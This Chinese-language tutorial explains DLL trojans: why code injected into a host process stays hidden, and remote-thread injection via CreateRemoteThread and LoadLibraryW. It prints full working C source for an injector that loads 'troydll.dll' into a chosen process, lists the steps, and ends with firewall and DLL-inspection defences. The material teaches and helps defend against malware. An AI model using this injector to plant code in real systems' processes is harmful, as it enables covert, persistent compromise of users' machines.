從前文可知,DLL在程序編制中可作出巨大貢獻,它提供了具共性代碼的複用能力。但是,正如一門高深的武學,若被掌握在正義之俠的手上,便可助其仗義江湖;但若被掌握在邪惡之徒的手上,則必然在江湖上掀起腥風血雨。DLL正是一種這樣的武學。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木馬,一種惡貫滿盈的病毒,令特洛伊一夜之間國破家亡。
DLL木馬的原理
DLL木馬的實現原理是編程者在DLL中包含木馬程序代碼,隨後在目標主機中選擇特定目標進程,以某種方式強行指定該進程調用包含木馬程序的DLL,最終達到侵襲目標系統的目的。
正是DLL程序自身的特點決定了以這種形式加載木馬不僅可行,而且具有良好的隱藏性:
(1)DLL程序被映射到宿主進程的地址空間中,它能夠共享宿主進程的資源,並根據宿主進程在目標主機的級別非法訪問相應的系統資源;
(2)DLL程序沒有獨立的進程地址空間,從而可以避免在目標主機中留下"蛛絲馬跡",達到隱蔽自身的目的。
DLL木馬實現了"真隱藏",我們在任務管理器中看不到木馬"進程",它完全溶進了系統的內核。與"真隱藏"對應的是"假隱藏","假隱藏"木馬把自己註冊成爲一個服務。雖然在任務管理器中也看不到這個進程,但是"假隱藏"木馬本質上還具備獨立的進程空間。"假隱藏"只適用於Windows9x的系統,對於基於WINNT的操作系統,通過服務管理器,我們可以發現系統中註冊過的服務。
DLL木馬注入其它進程的方法爲遠程線程插入。
遠程線程插入技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。將木馬程序以DLL的形式實現後,需要使用插入到目標進程中的遠程線程將該木馬DLL插入到目標進程的地址空間,即利用該線程通過調用Windows API LoadLibrary函數來加載木馬DLL,從而實現木馬對系統的侵害。
DLL木馬注入程序
這裏涉及到一個非常重要的Windows API――CreateRemoteThread。與之相比,我們所習慣使用的CreateThread API函數只能在進程自身內部產生一個新的線程,而且被創建的新線程與主線程共享地址空間和其他資源。而CreateRemoteThread則不同,它可以在另外的進程中產生線程!CreateRemoteThread有如下特點:
(1)CreateRemoteThread較CreateThread多一個參數hProcess,該參數用於指定要創建線程的遠程進程,其函數原型爲:
| HANDLE CreateRemoteThread( HANDLE hProcess, //遠程進程句柄 LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId ); |
(2)線程函數的代碼不能位於我們用來注入DLL木馬的進程所在的地址空間中。也就是說,我們不能想當然地自己寫一個函數,並把這個函數作爲遠程線程的入口函數;
(3)不能把本進程的指針作爲CreateRemoteThread的參數,因爲本進程的內存空間與遠程進程的不一樣。
以下程序由作者Shotgun的DLL木馬注入程序簡化而得(單擊此處下載,在經典書籍《Windows核心編程》中我們也可以看到類似的例子),它將d盤根目錄下的troydll.dll插入到ID爲4000的進程中:
| #include <windows.h>
#include <stdlib.h> #include <stdio.h> void CheckError ( int, int, char *); //出錯處理函數 PDWORD pdwThreadId; HANDLE hRemoteThread, hRemoteProcess; DWORD fdwCreate, dwStackSize, dwRemoteProcessId; PWSTR pszLibFileRemote=NULL; void main(int argc,char **argv) { int iReturnCode; char lpDllFullPathName[MAX_PATH]; WCHAR pszLibFileName[MAX_PATH]={0}; dwRemoteProcessId = 4000; strcpy(lpDllFullPathName, "d://troydll.dll"); //將DLL文件全路徑的ANSI碼轉換成UNICODE碼 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, lpDllFullPathName, strlen(lpDllFullPathName), pszLibFileName, MAX_PATH); CheckError(iReturnCode, 0, "MultByteToWideChar"); //打開遠程進程 hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創建線程 PROCESS_VM_OPERATION | //允許VM操作 PROCESS_VM_WRITE, //允許VM寫 FALSE, dwRemoteProcessId ); CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!"); //計算DLL路徑名需要的內存空間 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE); CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx"); //將DLL的路徑名複製到遠程進程的內存空間 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); CheckError(iReturnCode, false, "WriteProcessMemory"); //計算LoadLibraryW的入口地址 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); CheckError((int)pfnStartAddr, NULL, "GetProcAddress"); //啓動遠程線程,通過遠程線程調用用戶的DLL文件 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); CheckError((int)hRemoteThread, NULL, "Create Remote Thread"); //等待遠程線程退出 WaitForSingleObject(hRemoteThread, INFINITE); //清場處理 if (pszLibFileRemote != NULL) { VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); } if (hRemoteThread != NULL) { CloseHandle(hRemoteThread ); } if (hRemoteProcess!= NULL) { CloseHandle(hRemoteProcess); } } //錯誤處理函數CheckError() void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg) { if(iReturnCode==iErrorCode) { printf("%s Error:%d/n/n", pErrorMsg, GetLastError()); //清場處理 if (pszLibFileRemote != NULL) { VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); } if (hRemoteThread != NULL) { CloseHandle(hRemoteThread ); } if (hRemoteProcess!= NULL) { CloseHandle(hRemoteProcess); } exit(0); } } |
從DLL木馬注入程序的源代碼中我們可以分析出DLL木馬注入的一般步驟爲:
(1)取得宿主進程(即要注入木馬的進程)的進程ID dwRemoteProcessId;
(2)取得DLL的完全路徑,並將其轉換爲寬字符模式pszLibFileName;
(3)利用Windows API OpenProcess打開宿主進程,應該開啓下列選項:
a.PROCESS_CREATE_THREAD:允許在宿主進程中創建線程;
b.PROCESS_VM_OPERATION:允許對宿主進程中進行VM操作;
c.PROCESS_VM_WRITE:允許對宿主進程進行VM寫。
(4)利用Windows API VirtualAllocEx函數在遠程線程的VM中分配DLL完整路徑寬字符所需的存儲空間,並利用Windows API WriteProcessMemory函數將完整路徑寫入該存儲空間;
(5)利用Windows API GetProcAddress取得Kernel32模塊中LoadLibraryW函數的地址,這個函數將作爲隨後將啓動的遠程線程的入口函數;
(6)利用Windows API CreateRemoteThread啓動遠程線程,將LoadLibraryW的地址作爲遠程線程的入口函數地址,將宿主進程裏被分配空間中存儲的完整DLL路徑作爲線程入口函數的參數以另其啓動指定的DLL;
(7)清理現場。
DLL木馬的防治
從DLL木馬的原理和一個簡單的DLL木馬程序中我們學到了DLL木馬的工作方式,這可以幫助我們更好地理解DLL木馬病毒的防治手段。
一般的木馬被植入後要打開一網絡端口與攻擊程序通信,所以防火牆是抵禦木馬攻擊的最好方法。防火牆可以進行數據包過濾檢查,我們可以讓防火牆對通訊端口進行限制,只允許系統接受幾個特定端口的數據請求。這樣,即使木馬植入成功,攻擊者也無法進入到受侵系統,防火牆把攻擊者和木馬分隔開來了。
對於DLL木馬,一種簡單的觀察方法也許可以幫助用戶發現之。我們查看運行進程所依賴的DLL,如果其中有一些莫名其妙的DLL,則可以斷言這個進程是宿主進程,系統被植入了DLL木馬。"道高一尺,魔高一丈",現如今,DLL木馬也發展到了更高的境界,它們看起來也不再"莫名其妙"。在最新的一些木馬裏面,開始採用了先進的DLL陷阱技術,編程者用特洛伊DLL替換已知的系統DLL。特洛伊DLL對所有的函數調用進行過濾,對於正常的調用,使用函數轉發器直接轉發給被替換的系統DLL;對於一些事先約定好的特殊情況,DLL會執行一些相應的操作。
本文給出的只是DLL木馬最簡單情況的介紹,讀者若有興趣深入研究,可以參考其它資料。